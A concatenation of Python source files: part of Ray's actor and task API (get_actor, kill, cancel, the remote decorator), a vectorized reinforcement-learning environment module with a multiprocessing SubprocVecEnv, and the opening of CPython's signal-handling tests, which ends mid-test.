fetch_local,
)
return ready_ids, remaining_ids
@client_mode_hook
def get_actor(name):
"""Get a handle to a named actor.
Gets a handle to an actor with the given name. The actor must
have been created with Actor.options(name="name").remote(). This
works for both detached & non-detached actors.
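    For illustration, a minimal sketch (the actor name "counter" is a
    placeholder value):
    .. code-block:: python
        @ray.remote
        class Counter:
            def ping(self):
                return "pong"
        counter = Counter.options(name="counter").remote()
        handle = ray.get_actor("counter")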
Returns:
ActorHandle to the actor.
Raises:
ValueError if the named actor does not exist.
"""
if not name:
raise ValueError("Please supply a non-empty value to get_actor")
worker = global_worker
worker.check_connected()
handle = worker.core_worker.get_named_actor_handle(name)
return handle
@client_mode_hook
def kill(actor, *, no_restart=True):
"""Kill an actor forcefully.
This will interrupt any running tasks on the actor, causing them to fail
immediately. ``atexit`` handlers installed in the actor will not be run.
If you want to kill the actor but let pending tasks finish,
you can call ``actor.__ray_terminate__.remote()`` instead to queue a
termination task. Any ``atexit`` handlers installed in the actor *will*
be run in this case.
If the actor is a detached actor, subsequent calls to get its handle via
ray.get_actor will fail.
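    For illustration, a minimal sketch (``MyActor`` is a hypothetical
    ``@ray.remote`` class):
    .. code-block:: python
        actor = MyActor.remote()
        ray.kill(actor)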
Args:
actor (ActorHandle): Handle to the actor to kill.
no_restart (bool): Whether or not this actor should be restarted if
it's a restartable actor.
"""
worker = global_worker
worker.check_connected()
if not isinstance(actor, ray.actor.ActorHandle):
raise ValueError("ray.kill() only supported for actors. "
"Got: {}.".format(type(actor)))
worker.core_worker.kill_actor(actor._ray_actor_id, no_restart)
@client_mode_hook
def cancel(object_ref, *, force=False, recursive=True):
"""Cancels a task according to the following conditions.
If the specified task is pending execution, it will not be executed. If
the task is currently executing, the behavior depends on the ``force``
flag. When ``force=False``, a KeyboardInterrupt will be raised in Python
and when ``force=True``, the executing task will immediately exit.
If the task is already finished, nothing will happen.
Only non-actor tasks can be canceled. Canceled tasks will not be
retried (max_retries will not be respected).
Calling ray.get on a canceled task will raise a TaskCancelledError or a
WorkerCrashedError if ``force=True``.
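    For illustration, a minimal sketch (assuming Ray has been initialized):
    .. code-block:: python
        @ray.remote
        def blocking_task():
            import time
            time.sleep(1000)
        ref = blocking_task.remote()
        ray.cancel(ref)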
Args:
object_ref (ObjectRef): ObjectRef returned by the task
that should be canceled.
force (boolean): Whether to force-kill a running task by killing
the worker that is running the task.
recursive (boolean): Whether to try to cancel tasks submitted by the
task specified.
Raises:
TypeError: This is also raised for actor tasks.
"""
worker = ray.worker.global_worker
worker.check_connected()
if not isinstance(object_ref, ray.ObjectRef):
raise TypeError(
"ray.cancel() only supported for non-actor object refs. "
f"Got: {type(object_ref)}.")
return worker.core_worker.cancel_task(object_ref, force, recursive)
def _mode(worker=global_worker):
"""This is a wrapper around worker.mode.
We use this wrapper so that in the remote decorator, we can call _mode()
instead of worker.mode. The difference is that when we attempt to
serialize remote functions, we don't attempt to serialize the worker
object, which cannot be serialized.
"""
return worker.mode
def make_decorator(num_returns=None,
num_cpus=None,
num_gpus=None,
memory=None,
object_store_memory=None,
resources=None,
accelerator_type=None,
max_calls=None,
max_retries=None,
max_restarts=None,
max_task_retries=None,
worker=None):
def decorator(function_or_class):
if (inspect.isfunction(function_or_class)
or is_cython(function_or_class)):
# Set the remote function default resources.
if max_restarts is not None:
raise ValueError("The keyword 'max_restarts' is not "
"allowed for remote functions.")
if max_task_retries is not None:
raise ValueError("The keyword 'max_task_retries' is not "
"allowed for remote functions.")
if num_returns is not None and (not isinstance(num_returns, int)
or num_returns < 0):
raise ValueError(
"The keyword 'num_returns' only accepts 0 or a"
" positive integer")
if max_retries is not None and (not isinstance(max_retries, int)
or max_retries < -1):
raise ValueError(
"The keyword 'max_retries' only accepts 0, -1 or a"
" positive integer")
if max_calls is not None and (not isinstance(max_calls, int)
or max_calls < 0):
raise ValueError(
"The keyword 'max_calls' only accepts 0 or a positive"
" integer")
return ray.remote_function.RemoteFunction(
Language.PYTHON, function_or_class, None, num_cpus, num_gpus,
memory, object_store_memory, resources, accelerator_type,
num_returns, max_calls, max_retries)
if inspect.isclass(function_or_class):
if num_returns is not None:
raise TypeError("The keyword 'num_returns' is not "
"allowed for actors.")
if max_calls is not None:
raise TypeError("The keyword 'max_calls' is not "
"allowed for actors.")
if max_restarts is not None and (not isinstance(max_restarts, int)
or max_restarts < -1):
raise ValueError(
"The keyword 'max_restarts' only accepts -1, 0 or a"
" positive integer")
if max_task_retries is not None and (not isinstance(
max_task_retries, int) or max_task_retries < -1):
raise ValueError(
"The keyword 'max_task_retries' only accepts -1, 0 or a"
" positive integer")
return ray.actor.make_actor(function_or_class, num_cpus, num_gpus,
memory, object_store_memory, resources,
accelerator_type, max_restarts,
max_task_retries)
raise TypeError("The @ray.remote decorator must be applied to "
"either a function or to a class.")
return decorator
def remote(*args, **kwargs):
"""Defines a remote function or an actor class.
This can be used with no arguments to define a remote function or actor as
follows:
.. code-block:: python
@ray.remote
def f():
return 1
@ray.remote
class Foo:
def method(self):
return 1
It can also be used with specific keyword arguments as follows:
.. code-block:: python
@ray.remote(num_gpus=1, max_calls=1, num_returns=2)
def f():
return 1, 2
@ray.remote(num_cpus=2, resources={"CustomResource": 1})
class Foo:
def method(self):
return 1
Remote task and actor objects returned by @ray.remote can also be
dynamically modified with the same arguments as above using
``.options()`` as follows:
.. code-block:: python
@ray.remote(num_gpus=1, max_calls=1, num_returns=2)
def f():
return 1, 2
g = f.options(num_gpus=2, max_calls=None)
@ray.remote(num_cpus=2, resources={"CustomResource": 1})
class Foo:
def method(self):
return 1
Bar = Foo.options(num_cpus=1, resources=None)
Running remote actors will be terminated when the actor handle to them
in Python is deleted, which will cause them to complete any outstanding
work and then shut down. If you want to kill them immediately, you can
also call ``ray.kill(actor)``.
Args:
num_returns (int): This is only for *remote functions*. It specifies
the number of object refs returned by
the remote function invocation.
num_cpus (float): The quantity of CPU cores to reserve
for this task or for the lifetime of the actor.
num_gpus (int): The quantity of GPUs to reserve
for this task or for the lifetime of the actor.
resources (Dict[str, float]): The quantity of various custom resources
to reserve for this task or for the lifetime of the actor.
This is a dictionary mapping strings (resource names) to floats.
accelerator_type: If specified, requires that the task or actor run
on a node with the specified type of accelerator.
See `ray.accelerators` for accelerator types.
max_calls (int): Only for *remote functions*. This specifies the
maximum number of times that a given worker can execute
the given remote function before it must exit
(this can be used to address memory leaks in third-party
libraries or to reclaim resources that cannot easily be
released, e.g., GPU memory that was acquired by TensorFlow).
By default this is infinite.
max_restarts (int): Only for *actors*. This specifies the maximum
number of times that the actor should be restarted when it dies
unexpectedly. The minimum valid value is 0 (default),
which indicates that the actor doesn't need to be restarted.
A value of -1 indicates that an actor should be restarted
indefinitely.
max_task_retries (int): Only for *actors*. How many times to
retry an actor task if the task fails due to a system error,
e.g., the actor has died. If set to -1, the system will
retry the failed task until the task succeeds, or the actor
has reached its max_restarts limit. If set to `n > 0`, the
system will retry the failed task up to n times, after which the
task will throw a `RayActorError` exception upon :obj:`ray.get`.
Note that Python exceptions are not considered system errors
and will not trigger retries.
max_retries (int): Only for *remote functions*. This specifies
the maximum number of times that the remote function
should be rerun when the worker process executing it
crashes unexpectedly. The minimum valid value is 0,
            the default is 4, and a value of -1 indicates
infinite retries.
runtime_env (Dict[str, Any]): Specifies the runtime environment for
            this actor or task and its children. See ``runtime_env.py`` for
detailed documentation. Note: can only be set via `.options()`.
override_environment_variables (Dict[str, str]): This specifies
environment variables to override for the actor or task. The
overrides are propagated to all child actors and tasks. This
is a dictionary mapping variable names to their values. Existing
variables can be overridden, new ones can be created, and an
existing variable can be unset by setting it to an empty string.
Note: can only be set via `.options()`.
"""
worker = global_worker
if len(args) == 1 and len(kwargs) == 0 and callable(args[0]):
# This is the case where the decorator is just @ray.remote.
return make_decorator(worker=worker)(args[0])
# Parse the keyword arguments from the decorator.
error_string = ("The @ray.remote decorator must be applied either "
"with no arguments and no parentheses, for example "
"'@ray.remote', or it must be applied using some of "
"the arguments 'num_returns', 'num_cpus', 'num_gpus', "
"'memory', 'object_store_memory', 'resources', "
"'max_calls', or 'max_restarts', like "
"'@ray.remote(num_returns=2, "
"resources={\"CustomResource\": 1})'.")
assert len(args) == 0 and len(kwargs) > 0, error_string
for key in kwargs:
assert key in [
"num_returns",
"num_cpus",
"num_gpus",
"memory",
"object_store_memory",
"resources",
"accelerator_type",
"max_calls",
"max_restarts",
"max_task_retries",
"max_retries",
], error_string
num_cpus = kwargs["num_cpus"] if "num_cpus" in kwargs else None
num_gpus = kwargs["num_gpus"] if "num_gpus" in kwargs else None
resources = kwargs.get("resources")
if not isinstance(resources, dict) and resources is not None:
raise TypeError("The 'resources' keyword argument must be a "
f"dictionary, but received type {type(resources)}.")
if resources is not None:
assert "CPU" not in resources, "Use the 'num_cpus' argument."
assert "GPU" not in resources, "Use the 'num_gpus' argument."
accelerator_type = kwargs.get("accelerator_type")
# Handle other arguments.
num_returns = kwargs.get("num_returns")
max_calls = kwargs.get("max_calls")
max_restarts = kwargs.get("max_restarts")
max_task_retries = kwargs.get("max_task_retries")
memory = kwargs.get("memory")
object_store_memory = kwargs.get("object_store_memory")
max_retries = kwargs.get("max_retries")
return make_decorator(
num_returns=num_returns,
num_cpus=num_cpus,
num_gpus=num_gpus,
memory=memory,
object_store_memory=object_store_memory,
resources=resources,
accelerator_type=accelerator_type,
max_calls=max_calls,
max_restarts=max_restarts,
max_task_retries=max_task_retries,
max_retries=max_retries,
worker=worker)
vec_env.py
import inspect
import multiprocessing as mp
import warnings
from abc import ABC, abstractmethod
from collections import OrderedDict
from typing import Any, Callable, Dict, Iterable, List, Optional, Sequence, Tuple, Type, Union
import cloudpickle
import numpy as np
# Define type aliases here to avoid circular import
# Used when we want to access one or more VecEnv
VecEnvIndices = Union[None, int, Iterable[int]]
# VecEnvObs is what is returned by the reset() method
# it contains the observation for each env
VecEnvObs = Union[np.ndarray, Dict[str, np.ndarray], Tuple[np.ndarray, ...]]
# VecEnvStepReturn is what is returned by the step() method
# it contains the observation, reward, done, info for each env
VecEnvStepReturn = Tuple[VecEnvObs, np.ndarray, np.ndarray, List[Dict]]
class RunningMeanStd(object):
"""Calulates the running mean and std of a data stream.
https://en.wikipedia.org/wiki/Algorithms_for_calculating_variance#Parallel_algorithm
"""
def __init__(
self, mean: Union[float, np.ndarray] = 0.0, std: Union[float, np.ndarray] = 1.0
) -> None:
        # Note: the ``std`` argument is stored as the initial variance estimate.
        self.mean, self.var = mean, std
self.count = 0
def update(self, x: np.ndarray) -> None:
"""Add a batch of item into RMS with the same shape, modify mean/var/count."""
batch_mean, batch_var = np.mean(x, axis=0), np.var(x, axis=0)
batch_count = len(x)
delta = batch_mean - self.mean
total_count = self.count + batch_count
new_mean = self.mean + delta * batch_count / total_count
m_a = self.var * self.count
m_b = batch_var * batch_count
m_2 = m_a + m_b + delta ** 2 * self.count * batch_count / total_count
new_var = m_2 / total_count
self.mean, self.var = new_mean, new_var
self.count = total_count
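# Example (illustrative sketch): RunningMeanStd can be used to normalize a
# stream of observations, e.g.
#   rms = RunningMeanStd()
#   batch = np.random.randn(32, 4)  # hypothetical batch of observations
#   rms.update(batch)
#   normalized = (batch - rms.mean) / np.sqrt(rms.var + 1e-8)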
class VecEnv(ABC):
"""
An abstract asynchronous, vectorized environment.
:param num_envs: the number of environments
:param observation_space: the observation space
:param action_space: the action space
    :param norm_obs: Whether to normalize observations using running statistics
"""
def __init__(self, num_envs: int, observation_space, action_space, norm_obs=False):
self.num_envs = num_envs
self.observation_space = observation_space
self.action_space = action_space
self.norm_obs = norm_obs
if norm_obs:
self.obs_rms = RunningMeanStd()
self.__eps = np.finfo(np.float32).eps.item()
@abstractmethod
def reset(self) -> VecEnvObs:
"""
Reset all the environments and return an array of
observations, or a tuple of observation arrays.
If step_async is still doing work, that work will
be cancelled and step_wait() should not be called
until step_async() is invoked again.
:return: observation
"""
raise NotImplementedError()
@abstractmethod
def step_async(self, actions: np.ndarray) -> None:
"""
Tell all the environments to start taking a step
with the given actions.
Call step_wait() to get the results of the step.
You should not call this if a step_async run is
already pending.
"""
raise NotImplementedError()
@abstractmethod
def step_wait(self) -> VecEnvStepReturn:
"""
Wait for the step taken with step_async().
:return: observation, reward, done, information
"""
raise NotImplementedError()
@abstractmethod
def close(self) -> None:
"""
Clean up the environment's resources.
"""
raise NotImplementedError()
@abstractmethod
def get_attr(self, attr_name: str, indices: VecEnvIndices = None) -> List[Any]:
"""
Return attribute from vectorized environment.
:param attr_name: The name of the attribute whose value to return
:param indices: Indices of envs to get attribute from
:return: List of values of 'attr_name' in all environments
"""
raise NotImplementedError()
@abstractmethod
def set_attr(self, attr_name: str, value: Any, indices: VecEnvIndices = None) -> None:
"""
Set attribute inside vectorized environments.
:param attr_name: The name of attribute to assign new value
:param value: Value to assign to `attr_name`
:param indices: Indices of envs to assign value
:return:
"""
raise NotImplementedError()
@abstractmethod
def env_method(self, method_name: str, *method_args, indices: VecEnvIndices = None, **method_kwargs) -> List[Any]:
"""
Call instance methods of vectorized environments.
:param method_name: The name of the environment method to invoke.
:param indices: Indices of envs whose method to call
:param method_args: Any positional arguments to provide in the call
:param method_kwargs: Any keyword arguments to provide in the call
:return: List of items returned by the environment's method call
"""
raise NotImplementedError()
@abstractmethod
def env_is_wrapped(self, wrapper_class: 'Type[gym.Wrapper]', indices: VecEnvIndices = None) -> List[bool]:
"""
Check if environments are wrapped with a given wrapper.
        :param wrapper_class: The wrapper class to look for
        :param indices: Indices of envs to check
:return: True if the env is wrapped, False otherwise, for each env queried.
"""
raise NotImplementedError()
def step(self, actions: np.ndarray) -> VecEnvStepReturn:
"""
Step the environments with the given action
:param actions: the action
:return: observation, reward, done, information
"""
self.step_async(actions)
return self.step_wait()
def get_images(self) -> Sequence[np.ndarray]:
"""
Return RGB images from each environment
"""
raise NotImplementedError
def render(self, mode: str = "human") -> Optional[np.ndarray]:
"""
Gym environment rendering
:param mode: the rendering type
"""
raise NotImplementedError
@abstractmethod
def seed(self, seed: Optional[int] = None) -> List[Union[None, int]]:
"""
Sets the random seeds for all environments, based on a given seed.
Each individual environment will still get its own seed, by incrementing the given seed.
:param seed: The random seed. May be None for completely random seeding.
:return: Returns a list containing the seeds for each individual env.
Note that all list elements may be None, if the env does not return anything when being seeded.
"""
pass
@property
def unwrapped(self) -> "VecEnv":
if isinstance(self, VecEnvWrapper):
return self.venv.unwrapped
else:
return self
def getattr_depth_check(self, name: str, already_found: bool) -> Optional[str]:
"""Check if an attribute reference is being hidden in a recursive call to __getattr__
:param name: name of attribute to check for
:param already_found: whether this attribute has already been found in a wrapper
:return: name of module whose attribute is being shadowed, if any.
"""
if hasattr(self, name) and already_found:
return f"{type(self).__module__}.{type(self).__name__}"
else:
return None
def _get_indices(self, indices: VecEnvIndices) -> Iterable[int]:
"""
Convert a flexibly-typed reference to environment indices to an implied list of indices.
:param indices: refers to indices of envs.
:return: the implied list of indices.
"""
if indices is None:
indices = range(self.num_envs)
elif isinstance(indices, int):
indices = [indices]
return indices
def normalize_obs(self, obs: np.ndarray) -> np.ndarray:
"""Normalize observations by statistics in obs_rms."""
if self.norm_obs:
clip_max = 10.0 # this magic number is from openai baselines
# see baselines/common/vec_env/vec_normalize.py#L10
obs = (obs - self.obs_rms.mean) / np.sqrt(self.obs_rms.var + self.__eps)
obs = np.clip(obs, -clip_max, clip_max)
return obs
class VecEnvWrapper(VecEnv):
"""
    Base class for vectorized environment wrappers; by default calls are forwarded to the wrapped VecEnv.
:param venv: the vectorized environment to wrap
:param observation_space: the observation space (can be None to load from venv)
:param action_space: the action space (can be None to load from venv)
"""
def __init__(
self,
venv: VecEnv,
observation_space = None,
action_space = None,
):
self.venv = venv
VecEnv.__init__(
self,
num_envs=venv.num_envs,
observation_space=observation_space or venv.observation_space,
action_space=action_space or venv.action_space,
)
self.class_attributes = dict(inspect.getmembers(self.__class__))
def step_async(self, actions: np.ndarray) -> None:
self.venv.step_async(actions)
@abstractmethod
def reset(self) -> VecEnvObs:
pass
@abstractmethod
def step_wait(self) -> VecEnvStepReturn:
pass
def seed(self, seed: Optional[int] = None) -> List[Union[None, int]]:
return self.venv.seed(seed)
def close(self) -> None:
return self.venv.close()
def render(self, mode: str = "human") -> Optional[np.ndarray]:
return self.venv.render(mode=mode)
def get_images(self) -> Sequence[np.ndarray]:
return self.venv.get_images()
def get_attr(self, attr_name: str, indices: VecEnvIndices = None) -> List[Any]:
return self.venv.get_attr(attr_name, indices)
def set_attr(self, attr_name: str, value: Any, indices: VecEnvIndices = None) -> None:
return self.venv.set_attr(attr_name, value, indices)
def env_method(self, method_name: str, *method_args, indices: VecEnvIndices = None, **method_kwargs) -> List[Any]:
return self.venv.env_method(method_name, *method_args, indices=indices, **method_kwargs)
def env_is_wrapped(self, wrapper_class: 'Type[gym.Wrapper]', indices: VecEnvIndices = None) -> List[bool]:
return self.venv.env_is_wrapped(wrapper_class, indices=indices)
def __getattr__(self, name: str) -> Any:
"""Find attribute from wrapped venv(s) if this wrapper does not have it.
Useful for accessing attributes from venvs which are wrapped with multiple wrappers
which have unique attributes of interest.
"""
blocked_class = self.getattr_depth_check(name, already_found=False)
if blocked_class is not None:
own_class = f"{type(self).__module__}.{type(self).__name__}"
            error_str = (
                f"Error: Recursive attribute lookup for {name} from {own_class} is "
                f"ambiguous and hides attribute from {blocked_class}"
            )
raise AttributeError(error_str)
return self.getattr_recursive(name)
def _get_all_attributes(self) -> Dict[str, Any]:
"""Get all (inherited) instance and class attributes
:return: all_attributes
"""
all_attributes = self.__dict__.copy()
all_attributes.update(self.class_attributes)
return all_attributes
def getattr_recursive(self, name: str) -> Any:
"""Recursively check wrappers to find attribute.
:param name: name of attribute to look for
:return: attribute
"""
all_attributes = self._get_all_attributes()
if name in all_attributes: # attribute is present in this wrapper
attr = getattr(self, name)
elif hasattr(self.venv, "getattr_recursive"):
# Attribute not present, child is wrapper. Call getattr_recursive rather than getattr
# to avoid a duplicate call to getattr_depth_check.
attr = self.venv.getattr_recursive(name)
else: # attribute not present, child is an unwrapped VecEnv
attr = getattr(self.venv, name)
return attr
    def getattr_depth_check(self, name: str, already_found: bool) -> Optional[str]:
"""See base class.
:return: name of module whose attribute is being shadowed, if any.
"""
all_attributes = self._get_all_attributes()
if name in all_attributes and already_found:
# this venv's attribute is being hidden because of a higher venv.
shadowed_wrapper_class = f"{type(self).__module__}.{type(self).__name__}"
elif name in all_attributes and not already_found:
# we have found the first reference to the attribute. Now check for duplicates.
shadowed_wrapper_class = self.venv.getattr_depth_check(name, True)
else:
# this wrapper does not have the attribute. Keep searching.
shadowed_wrapper_class = self.venv.getattr_depth_check(name, already_found)
return shadowed_wrapper_class
class CloudpickleWrapper:
"""
Uses cloudpickle to serialize contents (otherwise multiprocessing tries to use pickle)
:param var: the variable you wish to wrap for pickling with cloudpickle
"""
def __init__(self, var: Any):
self.var = var
def __getstate__(self) -> Any:
return cloudpickle.dumps(self.var)
def __setstate__(self, var: Any) -> None:
self.var = cloudpickle.loads(var)
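# Illustrative sketch (an addition, not part of the original module): CloudpickleWrapper
# exists so that closures such as lambda env factories survive a plain pickle round trip,
# which is what multiprocessing relies on when sending work to subprocesses.
def _demo_cloudpickle_wrapper() -> None:
    import pickle
    make_value = lambda: 42  # plain pickle cannot serialize a lambda directly
    wrapped = CloudpickleWrapper(make_value)
    restored = pickle.loads(pickle.dumps(wrapped))  # __getstate__/__setstate__ delegate to cloudpickle
    assert restored.var() == 42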
def _worker(
remote: 'mp.connection.Connection', parent_remote: 'mp.connection.Connection', env_fn_wrapper: CloudpickleWrapper
) -> None:
# Import here to avoid a circular import
# from stable_baselines3.common.env_util import is_wrapped
parent_remote.close()
env = env_fn_wrapper.var()
needs_reset = False
while True:
try:
cmd, data = remote.recv()
if cmd == "step":
observation, reward, done, info = env.step(data)
if done:
# save final observation where user can get it, then reset
info["terminal_observation"] = observation
observation = env.reset()
remote.send((observation, reward, done, info))
elif cmd == "seed":
remote.send(env.seed(data))
elif cmd == "reset":
observation = env.reset()
remote.send(observation)
# if cmd == "step":
# if needs_reset:
# needs_reset = False
# time_step = env.reset()
# else:
# time_step = env.step(data)
# if time_step.last():
# needs_reset = True
# remote.send(time_step)
# elif cmd == "seed":
# remote.send(env.seed(data))
# elif cmd == "reset":
# needs_reset = False
# time_step = env.reset()
# remote.send(time_step)
elif cmd == "render":
remote.send(env.render(data))
elif cmd == "close":
env.close()
remote.close()
break
elif cmd == "get_spaces":
remote.send((env.observation_space, env.action_space))
elif cmd == "env_method":
method = getattr(env, data[0])
remote.send(method(*data[1], **data[2]))
elif cmd == "get_attr":
remote.send(getattr(env, data))
elif cmd == "set_attr":
remote.send(setattr(env, data[0], data[1]))
# elif cmd == "is_wrapped":
# remote.send(is_wrapped(env, data))
else:
raise NotImplementedError(f"`{cmd}` is not implemented in the worker")
except EOFError:
break
class SubprocVecEnv(VecEnv):
"""
Creates a multiprocess vectorized wrapper for multiple environments, distributing each environment to its own
process, allowing significant speed up when the environment is computationally complex.
For performance reasons, if your environment is not IO bound, the number of environments should not exceed the
number of logical cores on your CPU.
.. warning::
Only 'forkserver' and 'spawn' start methods are thread-safe,
which is important when TensorFlow sessions or other non thread-safe
libraries are used in the parent (see issue #217). However, compared to
'fork' they incur a small start-up cost and have restrictions on
global variables. With those methods, users must wrap the code in an
``if __name__ == "__main__":`` block.
For more information, see the multiprocessing documentation.
:param env_fns: Environments to run in subprocesses
:param start_method: method used to start the subprocesses.
Must be one of the methods returned by multiprocessing.get_all_start_methods().
Defaults to 'forkserver' on available platforms, and 'spawn' otherwise.
"""
def __init__(self,
env_fns: List[Callable[[], 'gym.Env']],
start_method: Optional[str] = None,
norm_obs: bool = False
):
self.waiting = False
self.closed = False
n_envs = len(env_fns)
if start_method is None:
# Fork is not a thread safe method (see issue #217)
# but is more user friendly (does not require to wrap the code in
# a `if __name__ == "__main__":`)
forkserver_available = "forkserver" in mp.get_all_start_methods()
start_method = "forkserver" if forkserver_available else "spawn"
ctx = mp.get_context(start_method)
self.remotes, self.work_remotes = zip(*[ctx.Pipe() for _ in range(n_envs)])
self.processes = []
for work_remote, remote, env_fn in zip(self.work_remotes, self.remotes, env_fns):
args = (work_remote, remote, CloudpickleWrapper(env_fn))
# daemon=True: if the main process crashes, we should not cause things to hang
process = ctx.Process(target=_worker, args=args, daemon=True) # pytype:disable=attribute-error
process.start()
self.processes.append(process)
work_remote.close()
self.remotes[0].send(("get_spaces", None))
observation_space, action_space = self.remotes[0].recv()
VecEnv.__init__(self, len(env_fns), observation_space, action_space, norm_obs)
def step_async(self, actions: np.ndarray) -> None:
for remote, action in zip(self.remotes, actions):
remote.send(("step", action))
self.waiting = True
def step_wait(self) -> VecEnvStepReturn:
results = [remote.recv() for remote in self.remotes]
self.waiting = False
# dones = np.stack([o.step_type.last() for o in obs])
# obs, rews, dones, infos = zip(*results)
# return _flatten_obs(results, self.observation_space), np.stack([o.reward for o in results]), np.stack([o.step_type.last() for o in results])
        obs, rews, dones, infos = zip(*results)
        # NOTE: obs_rms is never updated inside this class; with norm_obs=True the caller is
        # expected to feed raw observations to self.obs_rms.update(), otherwise normalize_obs()
        # only clips around the initial (mean=0, var=1) statistics.
        return self.normalize_obs(np.stack(obs)), np.stack(rews), np.stack(dones), infos
    def seed(self, seed: Optional[int] = None) -> List[Union[None, int]]:
        for idx, remote in enumerate(self.remotes):
            # guard against seed=None, for which per-env offsets make no sense
            remote.send(("seed", seed + idx if seed is not None else None))
return [remote.recv() for remote in self.remotes]
def reset(self) -> VecEnvObs:
for remote in self.remotes:
remote.send(("reset", None))
        obs = [remote.recv() for remote in self.remotes]
        # return _flatten_obs(obs, self.observation_space)
        return self.normalize_obs(np.stack(obs))  # normalize for consistency with step_wait()
def close(self) -> None:
if self.closed:
return
if self.waiting:
for remote in self.remotes:
remote.recv()
for remote in self.remotes:
remote.send(("close", None))
for process in self.processes:
process.join()
self.closed = True
def get_images(self) -> Sequence[np.ndarray]:
for pipe in self.remotes:
# gather images from subprocesses
# `mode` will be taken into account later
pipe.send(("render", "rgb_array"))
imgs = [pipe.recv() for pipe in self.remotes]
return imgs
def get_attr(self, attr_name: str, indices: VecEnvIndices = None) -> List[Any]:
"""Return attribute from vectorized environment (see base class)."""
target_remotes = self._get_target_remotes(indices)
for remote in target_remotes:
remote.send(("get_attr", attr_name))
return [remote.recv() for remote in target_remotes]
def set_attr(self, attr_name: str, value: Any, indices: VecEnvIndices = None) -> None:
"""Set attribute inside vectorized environments (see base class)."""
target_remotes = self._get_target_remotes(indices)
for remote in target_remotes:
remote.send(("set_attr", (attr_name, value)))
for remote in target_remotes:
remote.recv()
def env_method(self, method_name: str, *method_args, indices: VecEnvIndices = None, **method_kwargs) -> List[Any]:
"""Call instance methods of vectorized environments."""
target_remotes = self._get_target_remotes(indices)
for remote in target_remotes:
remote.send(("env_method", (method_name, method_args, method_kwargs)))
return [remote.recv() for remote in target_remotes]
def env_is_wrapped(self, wrapper_class: 'Type[gym.Wrapper]', indices: VecEnvIndices = None) -> List[bool]:
"""Check if worker environments are wrapped with a given wrapper"""
target_remotes = self._get_target_remotes(indices)
for remote in target_remotes:
remote.send(("is_wrapped", wrapper_class))
return [remote.recv() for remote in target_remotes]
def _get_target_remotes(self, indices: VecEnvIndices) -> List[Any]:
"""
Get the connection object needed to communicate with the wanted
envs that are in subprocesses.
:param indices: refers to indices of envs.
:return: Connection object to communicate between processes.
"""
indices = self._get_indices(indices)
return [self.remotes[i] for i in indices]
def _flatten_obs(obs: Union[List[VecEnvObs], Tuple[VecEnvObs]], space: 'gym.spaces.Space') -> VecEnvObs:
"""
Flatten observations, depending on the observation space.
:param obs: observations.
A list or tuple of observations, one per environment.
Each environment observation may be a NumPy array, or a dict or tuple of NumPy arrays.
:return: flattened observations.
A flattened NumPy array or an OrderedDict or tuple of flattened numpy arrays.
Each NumPy array has the environment index as its first axis.
"""
# assert isinstance(obs, (list, TimeStep)), "expected list or tuple of observations per environment"
    assert len(obs) > 0, "need observations from at least one environment"
    # NOTE: this helper is currently unused (its call sites above are commented out) and assumes
    # dm_env-style TimeStep observations together with a dict observation space.
    return OrderedDict([(k, np.stack([o.observation[k] for o in obs])) for k in space.keys()])
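# Illustrative usage sketch (an addition, not part of the original module). It assumes an
# older gym API where env.step() returns (obs, reward, done, info) and env.reset() returns
# only the observation, and that "CartPole-v1" is available; adjust the env id as needed.
# The __main__ guard matters because the default start methods are forkserver/spawn.
if __name__ == "__main__":
    import gym
    def _make_env():
        return gym.make("CartPole-v1")
    vec_env = SubprocVecEnv([_make_env for _ in range(2)])
    observations = vec_env.reset()  # shape: (num_envs,) + observation shape
    actions = np.array([vec_env.action_space.sample() for _ in range(vec_env.num_envs)])
    observations, rewards, dones, infos = vec_env.step(actions)
    vec_env.close()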
|
test_signal.py
|
import unittest
from test import support
from contextlib import closing
import enum
import gc
import pickle
import select
import signal
import struct
import subprocess
import traceback
import sys, os, time, errno
from test.script_helper import assert_python_ok, spawn_python
try:
import threading
except ImportError:
threading = None
class HandlerBCalled(Exception):
pass
def exit_subprocess():
"""Use os._exit(0) to exit the current subprocess.
Otherwise, the test catches the SystemExit and continues executing
in parallel with the original test, so you wind up with an
exponential number of tests running concurrently.
"""
os._exit(0)
def ignoring_eintr(__func, *args, **kwargs):
try:
return __func(*args, **kwargs)
except OSError as e:
if e.errno != errno.EINTR:
raise
return None
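# Illustrative sketch (an addition, not part of the original test file): ignoring_eintr()
# simply forwards the call's return value, swallows only EINTR, and re-raises anything else.
def _demo_ignoring_eintr():
    assert ignoring_eintr(os.getpid) == os.getpid()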
class GenericTests(unittest.TestCase):
@unittest.skipIf(threading is None, "test needs threading module")
def test_enums(self):
for name in dir(signal):
sig = getattr(signal, name)
if name in {'SIG_DFL', 'SIG_IGN'}:
self.assertIsInstance(sig, signal.Handlers)
elif name in {'SIG_BLOCK', 'SIG_UNBLOCK', 'SIG_SETMASK'}:
self.assertIsInstance(sig, signal.Sigmasks)
elif name.startswith('SIG') and not name.startswith('SIG_'):
self.assertIsInstance(sig, signal.Signals)
elif name.startswith('CTRL_'):
self.assertIsInstance(sig, signal.Signals)
self.assertEqual(sys.platform, "win32")
@unittest.skipIf(sys.platform == "win32", "Not valid on Windows")
class InterProcessSignalTests(unittest.TestCase):
MAX_DURATION = 20 # Entire test should last at most 20 sec.
def setUp(self):
self.using_gc = gc.isenabled()
gc.disable()
def tearDown(self):
if self.using_gc:
gc.enable()
def format_frame(self, frame, limit=None):
return ''.join(traceback.format_stack(frame, limit=limit))
def handlerA(self, signum, frame):
self.a_called = True
def handlerB(self, signum, frame):
self.b_called = True
raise HandlerBCalled(signum, self.format_frame(frame))
def wait(self, child):
"""Wait for child to finish, ignoring EINTR."""
while True:
try:
child.wait()
return
except OSError as e:
if e.errno != errno.EINTR:
raise
def run_test(self):
# Install handlers. This function runs in a sub-process, so we
# don't worry about re-setting the default handlers.
signal.signal(signal.SIGHUP, self.handlerA)
signal.signal(signal.SIGUSR1, self.handlerB)
signal.signal(signal.SIGUSR2, signal.SIG_IGN)
signal.signal(signal.SIGALRM, signal.default_int_handler)
# Variables the signals will modify:
self.a_called = False
self.b_called = False
# Let the sub-processes know who to send signals to.
pid = os.getpid()
child = ignoring_eintr(subprocess.Popen, ['kill', '-HUP', str(pid)])
if child:
self.wait(child)
if not self.a_called:
time.sleep(1) # Give the signal time to be delivered.
self.assertTrue(self.a_called)
self.assertFalse(self.b_called)
self.a_called = False
# Make sure the signal isn't delivered while the previous
# Popen object is being destroyed, because __del__ swallows
# exceptions.
del child
try:
child = subprocess.Popen(['kill', '-USR1', str(pid)])
# This wait should be interrupted by the signal's exception.
self.wait(child)
time.sleep(1) # Give the signal time to be delivered.
